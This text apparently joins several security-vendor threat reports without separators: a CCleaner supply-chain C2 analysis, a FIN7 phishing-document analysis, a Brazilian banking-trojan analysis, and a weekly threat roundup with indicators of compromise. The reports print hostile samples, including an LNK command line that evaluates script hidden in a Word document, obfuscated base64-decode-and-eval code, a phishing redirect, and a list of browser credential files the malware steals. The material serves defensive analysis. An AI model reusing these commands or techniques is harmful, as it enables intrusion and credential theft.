These new findings raise our level of concern about these events, as elements of our research point towards a possible unknown, sophisticated actor. These findings also support and reinforce our previous recommendation that those impacted by this supply chain attack should not simply remove the affected version of CCleaner or update to the latest version, but should restore from backups or reimage systems to ensure that they completely remove not only the backdoored version of CCleaner but also any other malware that may be resident on the system.

Technical Details

Web Server

The contents of the web directory taken from the C2 server included a series of PHP files responsible for controlling communications with infected systems. The attacker used a symlink to redirect all normal traffic requesting 'index.php' to the 'x.php' file, which contains the malicious PHP script.

In analyzing the contents of the PHP files, we identified that the server implemented a series of checks to determine whether to proceed with standard operations or simply redirect to the legitimate Piriform web site. The contents of the HTTP Host header, the request method type, and the server port are checked to confirm that they match what is expected from beacons sent from infected systems.

The PHP contains references to the required table for information storage within the 'x.php' variables as defined:

Within 'init.php' the $db_table is declared to allow insertion into the required database on the attacker infrastructure. This is 'Server' as defined below.

The web server also contains a second PHP file (init.php) that defines core variables and operations used. Interestingly, this configuration specifies "PRC" as the time zone, which corresponds with People's Republic of China (PRC). It’s important to note that this cannot be relied on for attribution. It also specifies the database configuration to use, as well as the filename and directory location to use for the variable $x86DllName.

The following information is gathered from infected systems, which is later used to determine how to handle those hosts. This includes OS version information, architecture information, whether the user has administrative rights, as well as the hostname and domain name associated with the systems.

The system profile information was rather aggressive and included specific information such as a list of software installed on the machine and all current running processes on the machine with no surprise that 'CCleaner.exe' was a current running process on the victim machine. The system profile information is then stored in the MySQL database.

There is also functionality responsible for loading and executing the Stage 2 payload on systems that meet the predefined requirements, similar to functionality that we identified would be required in our previous analysis of Stage 1. While there is shellcode associated with both x86 and x64 PE delivery, it appears that only the x86 PE loading functionality is actually utilized by the C2 server.

And below is the shellcode associated with the x64 version of the PE Loader.

The PHP script later compares the system beaconing to the C2 to three values: $DomainList, $IPList, and $HostList. This is to determine if the infected system should be delivered a Stage 2 payload. Below is condensed PHP code that demonstrates this:

The use of domain-based filtering further indicates the targeted nature of this attack. While we have confirmed that the number of systems affected by the backdoor was large based upon beacon information stored within the MySQL database, the attackers were specifically controlling which infected systems were actually delivered a Stage 2 payload. While it was reported that no systems executed a Stage 2 payload, this is not accurate. In analyzing the database table storing information on the systems that were delivered a Stage 2 payload, we identified 20 unique hosts that may have been affected by this payload. The functionality present within Stage 2 is documented in the "Stage 2 Payloads" section of this post.

MySQL Database

The C2 MySQL database held two tables: one describing all machines that had reported to the server and one describing all machines that received the second-stage download, both of which had entries were dated between Sept. 12th and Sept. 16th. Over 700,000 machines reported to the C2 server over this time period, and more than 20 machines have received the second-stage payload. It is important to understand that the target list can be and was changed over the period the server was active to target different organizations.

During the compromise, the malware would periodically contact the C2 server and transmit reconnaissance information about infected systems. This information included IP addresses, online time, hostname, domain name, process listings, and more. It's quite likely this information was used by the attackers to determine which machines they should target during the final stages of the campaign.

The main connection data is stored in the "Server" table. Here is an example of one of Talos' hosts in that database table:

In addition, the compromised machines would share a listing of installed programs.

A process list was also captured.

When combined, this information would be everything an attacker would need to launch a later stage payload that the attacker could verify to be undetectable and stable on a given system.

A second database table, separate from the 'Server' database table, contained an additional information set that was associated with systems that had actually been delivered the Stage 2 payload. This table contained similar survey information to the 'Server' database table, the structure of which is shown below:

In analyzing this second database table 'OK', we can confirm that after deduplicating entries, 20 systems were successfully delivered the Stage 2 payload. Talos reached out to the companies confirmed affected by this Stage 2 payload to alert them of a possible compromise.

Based on analysis of the 'Server' database table, it is obvious this infrastructure provides attackers access to a variety of different targets. Given the filtering in place on the C2 server, the attackers could add or remove domains at any given time, based upon the environments or organizations they choose to target. To provide additional perspective regarding the types of systems that the attackers could choose to further compromise, the screenshot below shows the number of total entries that were contained within the database table used to store system profile information:

The following screenshot shows the number of affected government systems around the world.

Likewise, looking at compromised systems belonging to domains containing the word 'bank' returns the following results:

This demonstrates the level of access that was made available to the attackers through the use of this infrastructure and associated malware and further highlights the severityand potential impact of this attack.

Stage 2 Payloads

The stage 2 installer is GeeSetup_x86.dll. This installer checks the OS version and then drops either a 32-bit or 64-bit version of a trojanized tool. The x86 version is using a trojanized TSMSISrv.dll, which drops VirtCDRDrv (which matches the filename of a legitimate executable that is part of Corel) using a similar method to the backdoored CCleaner tool. The x64 version drops a trojanized EFACli64.dll file named SymEFA which is the filename taken from a legitimate executable that is part of "Symantec Endpoint". None of the files that are dropped are signed or legitimate.

Effectively, they patch a legitimate binary to package their malware. Additionally, the setup put an encoded PE in the registry :

HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\001
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\002
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\003
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\004

The purpose of the trojanized binary is to decode and execute this PE in registry. This PE performs queries to additional C2 servers and executes in-memory PE files. This may complicate detection on some systems since the executable files are never stored directly on the file system.

Within the registry is a lightweight backdoor module which is run by the trojanized files. This backdoor retrieves an IP from data stegged into a github.com or wordpress.com search, from which an additional PE module is downloaded and run.

Code Reuse

Talos has reviewed claims from Kaspersky researchers that there is code overlap with malware samples known to be used by Group72. While this is by no means proof in terms of attribution, we can confirm the overlap and we agree that this is important information to be considered.

On the left: 2bc2dee73f9f854fe1e0e409e1257369d9c0a1081cf5fb503264aa1bfe8aa06f (CCBkdr.dll)

On the right: 0375b4216334c85a4b29441a3d37e61d7797c2e1cb94b14cf6292449fb25c7b2 (Missl backdoor - APT17/Group 72)

Conclusion

Supply chain attacks seem to be increasing in velocity and complexity. It's imperative that as security companies we take these attacks seriously. Unfortunately, security events that are not completely understood are often downplayed in severity. This can work counter to a victim's best interests. Security companies need to be conservative with their advice before all of the details of the attack have been determined to help users ensure that they remain protected. This is especially true in situations where entire stages of an attack go undetected for a long period of time. When advanced adversaries are in play, this is especially true. They have been known to craft attacks that avoid detection by specific companies through successful reconnaissance techniques.

In this particular example, a fairly sophisticated attacker designed a system which appears to specifically target technology companies by using a supply chain attack to compromise a vast number of victims, persistently, in hopes to land some payloads on computers at very specific target networks.

Coverage

Additional ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Indicators of Compromise (IOCs)

Below are indicators of compromise associated with this attack.

Installer on the CC: dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83 (GeeSetup_x86.dll)

64-bit trojanized binary: 128aca58be325174f0220bd7ca6030e4e206b4378796e82da460055733bb6f4f (EFACli64.dll)

32-bit trojanized binary: 07fb252d2e853a9b1b32f30ede411f2efbb9f01e4a7782db5eacf3f55cf34902 (TSMSISrv.dll)

DLL in registry: f0d1f88c59a005312faad902528d60acbf9cd5a7b36093db8ca811f763e1292a

Registry Keys:

• HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\001
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\002
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\003
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\004
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\HBP

Stage 2 Payload (SHA256):

dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83

This post was authored by Michael Gorelik and Josh Reynolds

Executive Summary

Throughout this blog post we will be detailing a newly discovered RTF document family that is being leveraged by the FIN7 group (also known as the Carbanak gang) which is a financially-motivated group targeting the financial, hospitality, and medical industries. This document is used in phishing campaigns to execute a series of scripting languages containing multiple obfuscation mechanisms and advanced techniques to bypass traditional security mechanisms. The document contains messages enticing the user to click on an embedded object that executes scripts which are used to infect the system with an information stealing malware variant. This malware is then used to steal passwords from popular browsers and mail clients which are sent to remote nodes that are accessible to the attackers. These advanced mechanisms and the information stealing malware will be discussed in detail. We will also review a number of static and dynamic detection mechanisms used in the AMP for Endpoints and Threat Grid product lines to detect these document families.

Introduction

On June 9th, 2017 Morphisec Labpublished a blog post detailing a new infection vector technique using an RTF document containing an embedded JavaScript OLE object. When clicked it launches an infection chain made up of JavaScript, and a final shellcode payload that makes use of DNS to load additional shellcode from a remote command and control server. In this collaboration post with Morphisec Lab and Cisco's Research and Efficacy Team, we are now publishing details of this new document variant that makes use of an LNK embedded OLE object, which extracts a JavaScript bot from a document object, and injects a stealer DLL in memory using PowerShell. The details we are releasing are to provide insight into attack methodologies being employed by sophisticated groups such as FIN7 who are consistently changing techniques between attacks to avoid detection, and to demonstrate the detection capabilities of the AMP for Endpoints and Threat Grid product lines. This is relevant to the constantly changing threats that are affecting multiple types of industries on a daily basis.

Infection Vector

The dropper variant that we encountered makes use of an LNK file to execute wscript.exe with the beginning of the JavaScript chain from a word document object:

C:\Windows\System32\cmd.exe..\..\..\Windows\System32\cmd.exe /C set x=wsc@ript /e:js@cript %HOMEPATH%\md5.txt & echo try{w=GetObject("","Wor"+"d.Application");this[String.fromCharCode(101)+'va'+'l'](w.ActiveDocument.Shapes(1).TextFrame.TextRange.Text);}catch(e){}; >%HOMEPATH%\md5.txt & echo %x:@=%|cmd

This chain involves a substantial amount of base64 encoded JavaScript files that make up each component of the JavaScript bot. It also contains the reflective DLL injection PowerShell code to inject an information stealing malware variant DLL which will be discussed further.

JavaScript Comparisons

Clustering Decoded JavaScript Functionality

A single one of these documents can produce as many as 40 JavaScript files. In order to identify similar techniques, we decided to use entropy of a given JavaScript file, and the base64 decoding depth to cluster files within a scatter plot with theggplot andggiraph R libraries.

Before we demonstrate our analysis results, we will explain the values used for plotting and clustering of the JavaScript files.

Base64 Encodings

The majority of the JavaScript obfuscation is nested base64 encodings. Base64 is a binary to text encoding scheme which can be used to represent any type of data. In the case of these documents it is used to encode JavaScript functionality multiple times, likely in order to avoid common analysis techniques employed by traditional anti-virus software which only emulate JavaScript instructions for a limited amount of iterations. The base64 blobs are hardcoded, or comma separated, which are then concatenated and decoded making up the next JavaScript code to be executed. It is decoded using an CDO.Message ActiveXObject invocation and specifying the ContentTransferEncoding to be base64 (note that the windows-1251 charset is Cyrillic, which may indicate Russian origin):

function b64dec(data){

    var cdo = new ActiveXObject("CDO.Message");
    var bp = cdo.BodyPart;
    bp.ContentTransferEncoding = "base64";
    bp.Charset = "windows-1251";
    var st = bp.GetEncodedContentStream();
    st.WriteText(data);
    st.Flush();
    st = bp.GetDecodedContentStream();
    st.Charset = "utf-8";
    return st.ReadText;
}

This is then evaluated using an obfuscated function invocation, E.G:

MyName.getGlct()[String.fromCharCode(101)+'va'+'l'](b64dec(energy));

These base64 decoding steps lead to various execution branches of JavaScript bot functionality, and the injection of a stealer DLL into memory:
Figure 1: Detailed Document Infection Chain Using JavaScript and DLL Injection

JavaScript Entropy

Entropy involves the calculation of disorder and uncertainty within a given amount of data. In this case, we are interested in associating extracted JavaScript files based on this calculation, since variations of these documents contain similar functionality, but employed obfuscation mechanisms makes clustering them difficult. We used the following calculation fromEro Carrera's blog in Python:

import math 

def H(data): 
    if not data: 
        return 0 
    entropy = 0 
    for x in range(256): 
        p_x = float(data.count(chr(x)))/len(data) 
        if p_x > 0: 
           entropy += - p_x*math.log(p_x, 2) 
    return entropy

This calculation is done for each JavaScript file and is the X axis of our scatter plots that will be described in the next section.

Scatter Plot for Clustering & JavaScript Functionality

We began with an initial set of documents which did not contain a dropper DLL. We then calculated the amount of base64 decoding required to produce each file (Y axis) and calculated their respective entropy (X axis). We then reviewed each scatter plot grouping and labeled their respective functionality in red:
Figure 2: Scatter plot using entropy and base64 decoding depth

There are a number of conclusions from the scatter plot:

1. The higher depth of base64 decoding shows more interesting functionality (to be expected)
2. The bot functionality and C2 contact JavaScript is within multiple sets of files at close decoding depths and entropy
3. The task scheduling functionality vary in depth and entropy (two separate cases)

We then applied the same technique to the second generation of documents which ship an entire base64 encoded and compressed DLL:
Figure 3: Scatter plot of PowerShell DLL documents

The outliers are the decoded DLLs and XML task files. When these components are removed from the scatter plot (leaving only JavaScript) we see similar clusters to the first generation of documents:
Figure 4: Modified Plot of PowerShell DLL Documents

Based on the number of clusters and range of entropy we see that this generation of documents contain more files with varying functionality and depth. This plotting technique also provides a method of identifying new functionality by showing outliers, such as the labeled PS Outlier which contains an array of encoded PowerShell bytes rather than a blob that provides the final PowerShell for DLL injection:
Figure 5: Identified New PowerShell Functionality Due to Entropy Outlier

JavaScript Obfuscation Changes

Once similar functionality has been clustered, the changes made between generated documents become apparent. Variable names and GUID paths are changed:
Figure 6: Variables and Path GUID JS Changes

This functionality also highlights an interesting obfuscation mechanism that some emulation engines may ignore. The function body of the evaluated JavaScript appears to be within a multi-line comment, however, in reality this is evaluated as a multi-line string. This can be seen below when tested in Chrome's scripting console:
Figure 7: JavaScript Multi-Line Comment String Obfuscation

Functions are re-ordered:
Figure 8: Reordered Function Example

Command and Control addresses are changed:
Figure 9: Changed Command and Control Addresses

Varying base64 encoding depths, which can be identified using our scatter plot, such as the PowerShell write and execution functionality:
Figure 10: PowerShell Write and Execute Functionality at Different Base64 Decoding Depths

Which when compared vary in decoding depth but are the same functionality:
Figure 11: Code Comparison PowerShell Write and Execute Functionality

 

 Stealer DLL

Recovering the DLL

One of the final components of these JavaScript 'decoding chains' is a PowerShell reflective DLL injection script which contains copy pasted functions fromPowersploit's Invoke-ReflectivePEInjection. The DLL is de-obfuscated by decoding the base64 blob and uses IO.Compression.DeflateStream to decompress the resulting bytes. In order to recover the DLL we can simply write the decompressed bytes to disk using [io.file]::WriteAllBytes.
Figure 12: PowerShell stream decompression and writing DLL to disk
Figure 13: Copy-Pasted PowerSploit Invoke-ReflectivePEInjection Code

Stealer DLL Functionality

We wrote a blog post about the H1N1 dropper in August 2016, whichreferenced a string de-obfuscation script to handle multiple 32-bit value XOR, ADD, and SUB string obfuscation techniques. This script is able to handle similar functionality in this stealer DLL:
Figure 14: Firefox String Decoding

Import hashing functionality involves resolving the export table for a given DLL (common for packers/malware):
Figure 15: PowerShell Injected DLL Hashing Functionality PE Offsets

Then using XOR and ROL algorithm over given export values to compare against given hashes for exports to resolve:
Figure 16: PowerShell Injected DLL Hashing Algorithm

This DLL also contains similar stealer functionality, E.G the decryption of Intelliform data using CryptUnprotectData by hashing cached URLs:
Figure 17: PowerShell Injected DLL Intelliform Data Stealing

This binary also contains Outlook and Firefox stealer functionality and the ability to steal login information from Google Chrome, Chromium, forks of Chromium and Opera browsers that will be discussed in the next section.

Chrome, Chromium and Opera Credential Stealing

The Chrome, Chromium, Chromium forks and Opera credential stealing functionality opens the [Database Path]\Login Data sqlite3 database, reads the URL, username, and password fields, and calls CryptUnprotectData to decrypt user passwords. The following paths are checked for this database under %APPDATA%, %PROGRAMDATA%, and %LOCALAPPDATA%:

• \Google\Chrome\User Data\Default\Login Data
• \Chromium\User Data\Default\Login Data
• \MapleStudio\ChromePlus\User Data\Default\Login Data
• \YandexBrowse\User Data\Default\Login Data
• \Nichrom\User Data\Default\Login Data
• \Comodo\Dragon\User Data\Default\Login Data

Although Opera is not a fork of Chromium, the newest version has credentials with the same implementation under the path: \Opera Software\Opera Stable\Login Data

Stolen Data Command and Control

In addition to the JavaScript bot functionality, the stolen data is dumped to %APPDATA%\%USERNAME%.ini and sets the file creation time to be that of ntdll.dll. This data is read and encrypted using the SimpleEncrypt function, which as their name implies, is a simple substitution cipher:
Figure 18: Command and Control Data Substitution Cipher

This is then POSTed to a hardcoded command and control addresses, including the Google Apps Script hosting service (also notice the alfIn variable declaration which is the alphabet used for the substitution cipher):
Figure 19: Command and Control Data Exfiltration JavaScript Functionality

This is again using the comment block evasion technique.

AMP Coverage

The AMP for Endpoints and Threat Grid product lines are ideal for dealing with this threat, as they can use both static and dynamic activity to detect malicious activity.

AMP Threat Grid

Without clicking on the embedded OLE object within the document Threat Grid can provide insight into possible malicious activity using static attributes alone. Embedded functionality is automatically extracted by Threat Grid, in this instance the embedded LNK OLE object contains seemingly malicious commands that are executed when clicked:
Figure 20: Document LNK Command Prompt Static Attributes
Figure 21: Active Document LNK Static Attributes

The OLE object can be clicked on within the document during the Threat Grid run using the Open Embedded Object in Word Document playbook, which will automatically execute the embedded object during the Threat Grid run when selected from the submission dropdown menu:
Figure 22: Selecting Playbook from Submission Menu

A depiction of this automated user interaction can be seen below:
Figure 23: Clicking on Document OLE Object Through Playbook

When clicked additional behavioral indicators are triggered based on dynamic behavior:
Figure 24: Dynamic Activity Caused by Clicking the OLE Object

Task creations (used by the JavaScript bot for periodic execution of components) can also be observed:
Figure 25: Task Creation Dynamic Activity

The JavaScript content that is periodically executed can be seen the Artifacts section and can be downloaded or resubmitted for further analysis:
Figure 26: Written JavaScript Artifact Objects

This intelligence is then integrated back into the AMP cloud protecting all customers who may be targeted by similar attack methodologies.

AMP for Endpoints

AMP for Endpoints has the ability to observe dynamic activity through a number of methods. One of these is the capture of command line arguments which are then sent to the AMP cloud for analysis. In this case, we're able to observe the execution of wscript.exe when the OLE object is clicked:

Figure 27: Captured Command Line Arguments in AMP for Endpoints Device Trajectory

This triggers an Indicator of Compromise which can then be further investigated:

Figure 28: Indicator of Compromise from Captured Command Line Arguments

Conclusion

The FIN7 group is an example of an advanced adversary targeting a variety of industries using conventional technologies that ship with most versions of Microsoft Windows. Through the use of Microsoft Word documents to ship entire malware platforms they have the ability to leverage scripting languages to access ActiveX controls, and "file-less" techniques to inject shipped portable executables into memory using PowerShell without ever having the portable executable touch disk. Clustering JavaScript also demonstrates a number of ways FIN7 makes minor changes between releases, and establishes outliers to observe major changes. Through the observation of static and dynamic attributes we're able to establish indicators of compromise based on the embedded OLE object which can be used to identify FIN7 documents, and identify documents which may be leveraging similar functionality to protect our customers.

Coverage

Talos has released the following Snort rule(s) to address this threat. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules: 44430-44433

Additional ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.
CWS orWSA web scanning prevents access to malicious websites and detects malware used in these attacks.
Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.
AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Indicators of Compromise

JavaScript Bot Documents

6bc8770206c5f2bb4079f7583615adeb4076f2e2d0c655fbafedd9669dc3a213
df22408833b2ae58f0d3e2fe87581be31972ef56e0ebf5efafc4e6e0341b5521
2b4991b2a2792436b50404dcf6310ef2af2573505810ebac08e32f17aee3fbbe
ebca565e21a42300e19f250f84b927fa3b32debf3fe13003a4aa5b71ed5cbee9
6604d806eb68fdf914dfb6bbf907a4f2bd9b8757fc4da4e7c5e4de141b8d4e2c

JavaScript Bot Documents with PowerShell DLL Injection

91f028b1ade885bae2e0c6c3be2f3c3dc692830b45d4cf1a070a0bd159f1f676
ad578311d43d3aea3a5b2908bc6e408b499cc832723225ff915d9a7bc36e0aa4
fadb57aa7a82dbcb2e40c034f52096b63801efc040dd8559a4b8fc873bc962a1
91f028b1ade885bae2e0c6c3be2f3c3dc692830b45d4cf1a070a0bd159f1f676
74a5471c3aa6f9ce0c806e85929c2816ac39082f7fea8dbe8e4e98e986d4be78
f73c7ed3765fec13ffd79aef97de519cfbd6a332e81b8a247fe7d1ccb1946c9c

Command and Control IPs

104[.]232[.]34[.]36
5[.]149[.]253[.]126
185[.]180[.]197[.]20
195[.]54[.]162[.]79
31[.]148[.]219[.]18

Google Apps Script Command and Control URLs

hXXps://script[.]google[.]com/macros/s/AKfycbxvGGF-QBkaNIWCBFgjohBtkmyfyRpvm91yCGEvzgDvAJdqfW8_/exec
hXXps://script[.]google[.]com/macros/s/AKfycbz6dmNJfCPwFchoq6WkJsMjQu22SJTJ9pxMUeQR7bCpmJhW6Bg2/exec
hXXps://script[.]google[.]com/macros/s/AKfycbwkNc-8rk0caDWO5I4KMymvOXVinfOpR1eevZ63xiXDvcoqOE6p/exec
hXXps://script[.]google[.]com/macros/s/AKfycbxyiIBW9SHUFV4S5JM6IW-dmVADFOrTJDM7bZspeBf2Kpf4IN0/exec

This post was authored by Warren Mercer, Paul Rascagneres and Vanja Svajcer

Introduction

Banking trojans are among some of the biggest threats to everyday users as they directly impact the user in terms of financial loss. Talos recently observed a new campaign specific to South America, namely Brazil. This campaign was focused on various South American banks in an attempt to steal credentials from the user to allow for illicit financial gain for the malicious actors. The campaign Talos analysed focused on Brazilian users and also attempted to remain stealthy by using multiple methods of re-direction in an attempt to infect the victim machine. It also used multiple anti-analysis techniques and the final payload was written in Delphi which is quite unique to the banking trojan landscape.

Infection Vector

Spam Example

As with a lot of banking trojan campaigns, this one starts with a malicious spam campaign. Here is an example of an email used during this campaign. The attacker used an email written in Portuguese which makes it seemingly more legitimate for the user - receiving email in a native language gives the attackers a higher likelihood of achieving their mission objective, convincing the victim to open the malicious attachment.



The email contains an HTML attachment named BOLETO_2248_.html, a Boleto refers to a type of invoice used in Brazil. The HTML document contains a simple redirection to a first website:

<html>

<head>

<title>2Via Boleto</title>

</head>

<body>

</body>

</html>

<meta http-equiv="refresh" content="0; url=http://priestsforscotland[.]org[.]uk/wp-content/themes/blessing/0032904.php">

Redirection, Redirection and… Redirection

The URL contained in the HTML attachment is a first redirect to a goo.gl URL shortener:



A second redirect is performed by the goo.gl URL. This shortened URL points to hxxp://thirdculture[.]tv:80/wp/wp-content/themes/zerif-lite/97463986909837214092129.rar.



Finally, the archive contains a JAR file named BOLETO_09848378974093798043.jar. If the user double clicks on the JAR file, java will execute the malicious code and will start the installation process of this banking trojan.

Java Execution

The first step of the Java code is to setup the working environment of the malware and to download additional files from hxxp://104[.]236[.]211[.]243/1409/pz.zip. The malware is working in the C:\Users\Public\Administrator\ directory which it creates as this is not a default folder. The new archive contains a new set of binaries.



On the last step, the Java code renames the downloaded binaries and executes vm.png (previously renamed):

Malware Loading

The first executed binary is vm.png. It's a legitimate binary from VMware and is signed with a VMware digital signature.



One of the dependencies of the binary is vmwarebase.dll:

Python 2.7.12 (default, Nov 19 2016, 06:48:10)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import pefile
>>> pe = pefile.PE("vm.png")
>>> for entry in pe.DIRECTORY_ENTRY_IMPORT:
...   print entry.dll

...

MSVCR90.dll
ADVAPI32.dll
vmwarebase.DLL
KERNEL32.dll

The vmwarebase.dll is not the legitimate binary but a malicious binary. This technique has been used previously by other actors such as PlugX. The idea behind this approach is that some security products have the following trust chain: if a first binary is trusted (vm.png in our case), the loaded libraries are automatically trusted. The loading technique can bypass some security checks.

The purpose of the vmwarebase.dll code is to inject and execute the prs.png code in explorer.exe or in notepad.exe depending on the context of the user account. The injection is performed by allocating memory in the remote process and the usage of LoadLibrary() to load the gbs.png library. The API usage is obfuscated by encryption (AES):



Once decrypted the m5ba+5jOiltH7Mff7neiMumHl2s= is LoadLibraryA and QiF3gn1jEEw8XUGBTz0B5i5nkPY= is kernel32.dll

Banking Trojan

The main module of the banking trojan contains a lot of features. For example, it will attempt to terminate analyst processes such as taskmgr.exe (Task Manager), msconfig.exe (MsConfig), regedit.exe (Registry Editor) and ccleaner.exe and ccleaner64.exe. This module creates a autostart registry key which attempts to use a legitimate looking name: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Vmware Base.

This module is used to get the title of the window in the foreground of the user. The purpose is to identify if the user has a windows with one the following title (these strings are encrypted in the sample):

Navegador Exclusivo Sicoobnet Aplicativo Ita Internet Banking BNB Banestes Internet Banking Banrisul bb.com.br bancobrasil.com Banco do Brasil Autoatendimento Pessoa Física - Banco do Brasil internetbankingcaixa Caixa - A vida pede mais que um banco SICREDI Banco Bradesco S/A Internet Banking 30 horas Banestes Internet Banking Banrisul

This list contains the targeted financial institutions located in Brazil. This trojan leveraged Web Injects to allow them to interact with the banking website. Another task performed by this main module is to execute the last binary: gps.png (renamed previously with the .drv extension) with rundll32.exe:



This library is packed using Themida which has made it significantly difficult to unpack.

The following debug strings were left in the samples analysed by the developer. The strings are in Portuguese:

<|DISPIDA|>Iniciou!
<|PRINCIPAL|>
<|DISPIDA|>Abriu_IE
<|Desktop|>
<|DISPIDA|>Startou!
<|Enviado|>

These strings are sent to the C2 server when specific actions are performed on the infected system. The C2 configuration is stored in the i.dk plain text file (encrypted in AES 256). This file contains a date, an IP and additional configuration items:

07082017
191.252.65.139
6532

Conclusion

Banking trojans continue to form part of the threat landscape, they continually evolve and also can, like this specific example, be very specific to the region they are attacking. This often doesn't suggest the attackers are from that region but they have decided that there is perhaps less security conscious users living there. Financial gain will continue to be a huge motivator for attackers and as with this sample the evolution of the malware continues to grow. Using commercial packing platforms like Themida will continue to make analysis difficult for analysts and shows that some attackers are willing to obtain these types of commercial packers in an attempt to thwart analysis.

IOCs

927d914f46715a9ed29810ed73f9464e4dadfe822ee09d945a04623fa3f4bc10 HTML attachment

5730b4e0dd520caba11f9224de8cfd1a8c52e0cc2ee98b2dac79e40088fe681c RAR archive

B76344ba438520a19fff51a1217e3c6898858f4d07cfe89f7b1fe35e30a6ece9 BOLETO_09848378974093798043.jar

0ce1eac877cdd87fea25050b0780e354fe3b7d6ca96c505b2cd36ca319dc6cab gbs.png

6d8c7760ac76af40b7f9cc4af31da8931cef0d9b4ad02aba0816fa2c24f76f10 i.dk

56664ec3cbb228e8fa21ec44224d68902d1fbe20687fd88922816464ea5d4cdf prs.png

641a58b667248fc1aec80a0d0e9a515ba43e6ca9a8bdd162edd66e58703f8f98 pz.zip

79a68c59004e3444dfd64794c68528187e3415b3da58f953b8cc7967475884c2 vm.png

969a5dcf8f42574e5b0c0adda0ff28ce310e0b72d94a92b70f23d06ca5b438be vmwarebase.dll

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between September 22 and September 29. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

• Doc.Downloader.Jrat-6336393-1
  Downloader
  Malicious Office documents containing an embedded OLE object which can be an executable or Java JAR module mainly to contact certain domain and download additional malicious code
   
• Doc.Dropper.Agent-6336814-0
  Office Macro Downloader
  This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable.
   
• Doc.Macro.DownloadExe-6336397-0
  Office Macro
  This set of downloaders use hardcoded URLs to download and execute a sample on the machine. The VBA contains no obfuscation and contains just enough functionality to accomplish its task.
   
• Doc.Macro.VBSDownloader-6336817-0
  Downloader
  The macros in these Word documents are base64 encoded and, when executed, download additional malicious files from an obfuscated list of URLs.
   
• Win.Ransomware.TorrentLocker-6336835-0
  Ransomware
  TorrentLocker uses AES encryption to encrypt files on an infected host before demanding a ransom payment in Bitcoin. Code is unpacked from a series of strings through character replacement, selective subset parsing, and a final conversion that is written to the stack for later execution. Spawned child processes and additional binary drops follow afterward.
   
• Win.Spyware.CCBkdr-6336251-2
  APT Supply chain attack
  Version 5.33 of CCleaner was compromised before vendor signing and was distributed with a backdoor module embedded. More information available at http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html and http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html
   
• Win.Trojan.Beeldeb-6336738-0
  Trojan
  Win.Trojan.Beeldeb-6336738-0 is a self-executing AutoIT script. The malware payload is injected into a dropped executable. Further, the malware adds itself to the startup folder for persistence.
   
• Win.Trojan.Cossta-237
  Trojan
  Win.Trojan.Cossta-237 is a trojan that will download additional files and potentially receive further instructions from its operator.
   
• Win.Worm.Untukmu-5949608-0
  Worm
  This worm is highly malicious and contains several anti-analysis mechanisms such as anti-debugging techniques as well as to avoid its removal also in SafeBoot. After the infection it gains persistence and disable cmd and the registry editor.
   

---

Threats

Doc.Downloader.Jrat-6336393-1

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• mike22[.]linkpc[.]net

Files and or directories created

• %AppData%\Microsoft\Office\Recent\ITT Tender - ABB -3600002386- Provision of Supply and Installation.LNK

File Hashes

• 1508a8ab14c4639853c9f2e598a142756517bd078f505274b5783ddda8fed0a0
• 1570586012e23a7de3a8fd965bdc2d3a96175fd8a77d284827c1ed6d58944a7e
• 339ceac2076e833babc1ac838848ab2787af062835a24f05e0bf20ab1ec79ccf
• 6f276350ce399502dbf870702e1a09ee39b591b93ebface9d3214ce9822aed61
• 7dd8b4746bf2de079b3b66e9d5e0492cde0a3838311252176a8831c3fd64b33b
• 7e4ef415a75cea7d3d610c44c0fa51d0fba956cc8136784115641054cd470fa0
• 9394e12d1fe6d3627f5f928aff4a15699aa129e44fd4fd9eba29f6ad5a4f7556
• a5dfb783b89232fcc317194d267b8cf7204ae457d86eb5cdf703a656c03f1b71
• a601c81547e7180d284e2fa701599615070653cceaf63108a11c40821edbf024
• baba92ad2bf34ef95611656722344af6b60f731e7cdc4a341f64658837976899
• bb4793538712834408cd9b3b58c1edf8da81906ffc12e25766fb40ddabe1c383
• 50c1020efca0698519c89b468fc25926d1bad2eeb421482d9c17b6ab24535217
